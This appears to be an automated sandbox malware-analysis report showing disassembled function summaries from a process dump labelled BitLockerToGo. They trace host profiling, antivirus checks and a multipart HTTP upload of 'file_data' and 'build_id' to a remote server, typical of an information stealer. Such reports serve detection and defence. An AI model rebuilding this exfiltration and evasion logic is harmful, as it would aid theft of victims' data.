                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 907984538-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ee8d699dffb8df52ba70e94b5a0e7d04b3546a35a6ffd22a41b3d2181e86ff1a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 23ee148b49017eddb3f0f2eab54064901dfa00800df84b6e3e9be480bc17fd8a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee8d699dffb8df52ba70e94b5a0e7d04b3546a35a6ffd22a41b3d2181e86ff1a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73112171A1021CABD721BB79DC85BFEB7A8FB45701F000095BA05E7251DE74AF85CA52
                                                                                                                                                                                                                                                                                                                    Function 008F3AB9 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,008E543A,?,?,?,?), ref: 008F3AD9
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 008F3AE6
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F3AED
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 869800140-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 860b051bbe447a258bb3cdeefe242c68c08210437f6e7c0929d9e3015e4f08f8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 50af11d9b365aec20f174672b4b89dae96f77353adddf88b33fefd8905f32c35
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 860b051bbe447a258bb3cdeefe242c68c08210437f6e7c0929d9e3015e4f08f8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A010870100208BFEF128F61DC99DBB7BAAFF49364B244568F945D3210DB319A51EA20
                                                                                                                                                                                                                                                                                                                    Function 008F298A Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 008F29A5
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F29AC
                                                                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 008F29BB
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F29D9
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3317088062-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: aba6c15e6dfacbacf836926173399fbe752f97178d7e8f3cd8925c73e617a3ee
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5a4b50127410648dc2b800f8cfa4ddf759b37d9de75df51ee04e8647078c784f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aba6c15e6dfacbacf836926173399fbe752f97178d7e8f3cd8925c73e617a3ee
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5F0B470A00218BBE710AB78EC09FAA7768FF04324F100255F515D31D0DF709E55C692
                                                                                                                                                                                                                                                                                                                    Function 008F28AF Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E13A9), ref: 008F28BB
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F28C2
                                                                                                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,008E13A9), ref: 008F28D6
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1296208442-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b868ea0758e362a08aa20c89e1cd23ad433b0f36a192c3eebabb71a9719aa6df
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f2b4bfbc1311446d84e3a74bd7d834ea283425adef6ce001690899490537cd5b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b868ea0758e362a08aa20c89e1cd23ad433b0f36a192c3eebabb71a9719aa6df
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38D05BF5B14344BBD7005B95DC0DECA77BCD788755F004056F705D2150D6F09A88D630
                                                                                                                                                                                                                                                                                                                    Function 008F2C16 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8447e45f26d547429570beb104bb04493ec8569468a509b0611b8d5c24a7aa81
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 874b7b4c594d7b6bcd7e84284494ab59f7a7d76ea9157186d4397eae06f4dcf4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8447e45f26d547429570beb104bb04493ec8569468a509b0611b8d5c24a7aa81
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EE06D70E1020CABCB11DFA0EC45ADEB3FCAB08304F4041B59505D3190DA70AB89CF85
                                                                                                                                                                                                                                                                                                                    Function 008E149D Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?,?,?,?,?,008E14F3,avghookx.dll,008F9D23), ref: 008E14CF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 51dbb5584aa74269152b105a73d0a9895f1e02a36209ac6c25b67837d9f7cab1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c3f4ed9a4a000d3807708df7ff0bb1f180fe67f8d8b41791737360c0e18c108a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51dbb5584aa74269152b105a73d0a9895f1e02a36209ac6c25b67837d9f7cab1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3F05E36A04154ABCF20CF56D808AAAF7B9FB47768F256054D409F7240C330ED40EA9C
                                                                                                                                                                                                                                                                                                                    Function 008E53AA Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 29 8e53aa-8e54bb call 8f2143 call 8f2175 call 8e49de call 8f3ab9 lstrlen call 8f3ab9 call 8f2143 * 4 StrCmpCA 48 8e54bd 29->48 49 8e54c3-8e54c9 29->49 48->49 50 8e54cb-8e54e0 InternetOpenA 49->50 51 8e54e6-8e55f6 call 8f38a6 call 8f2223 call 8f21e9 call 8e2910 * 2 call 8f2265 call 8f2223 call 8f2265 call 8f21e9 call 8e2910 * 3 call 8f2265 call 8f2223 call 8f21e9 call 8e2910 * 2 InternetConnectA 49->51 50->51 52 8e5d8c-8e5e14 call 8e2910 * 4 call 8f2175 call 8e2910 * 3 50->52 51->52 118 8e55fc-8e563a HttpOpenRequestA 51->118 87 8e5e16-8e5e56 call 8e2910 * 6 call 8fe88c 52->87 119 8e5d80-8e5d86 InternetCloseHandle 118->119 120 8e5640-8e5646 118->120 119->52 121 8e5648-8e565e InternetSetOptionA 120->121 122 8e5664-8e5c9f call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2223 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 call 8f2265 call 8f21e9 call 8e2910 lstrlen * 2 GetProcessHeap RtlAllocateHeap lstrlen call 9088d0 lstrlen call 9088d0 lstrlen * 2 call 9088d0 lstrlen HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 8e5cdd-8e5ced call 8f3759 122->309 310 8e5ca1-8e5cd8 call 8f2143 call 8e2910 * 3 122->310 315 8e5e57 309->315 316 8e5cf3-8e5cf8 309->316 310->87 318 8e5d39-8e5d56 InternetReadFile 316->318 320 8e5cfa-8e5d02 318->320 321 8e5d58-8e5d6b StrCmpCA 318->321 320->321 323 8e5d04-8e5d34 call 8f2265 call 8f21e9 call 8e2910 320->323 324 8e5d6d-8e5d6e ExitProcess 321->324 325 8e5d74-8e5d7a InternetCloseHandle 321->325 323->318 325->119
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E5441
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3AB9: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,008E543A,?,?,?,?), ref: 008F3AD9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3AB9: GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 008F3AE6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3AB9: RtlAllocateHeap.NTDLL(00000000), ref: 008F3AED
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00917A3B,00917A3A,00917A37,00917A2F), ref: 008E54B0
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E54D2
                                                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E55E8
                                                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 008E562C
                                                                                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E565E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,",file_data,00918A18,------,00918A0C,?,",00918A00,------,009189F4,635b5ceb8ed09951eb8d5e776815ad72,",build_id,009189DC,------), ref: 008E5B8F
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E5BA2
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E5BBA
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E5BC1
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E5BCE
                                                                                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 008E5BDC
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,?), ref: 008E5BF1
                                                                                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 008E5BFE
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E5C0C
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 008E5C1A
                                                                                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 008E5C2D
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 008E5C42
                                                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(?,?,00000000), ref: 008E5C55
                                                                                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 008E5C97
                                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 008E5D4E
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,block), ref: 008E5D63
                                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 008E5D6E
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocateOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                                                                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$635b5ceb8ed09951eb8d5e776815ad72$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                                                                                                    • API String ID: 4232923880-2091041255
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d94445ed71f065b383326199e5ec8efcfc5097a635ab3f6e1771aae64ab80d7b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 62de4fa9e8291eac559e27c17ccd219f023ba0fb79a07f2b2e7cbbf956ae177b
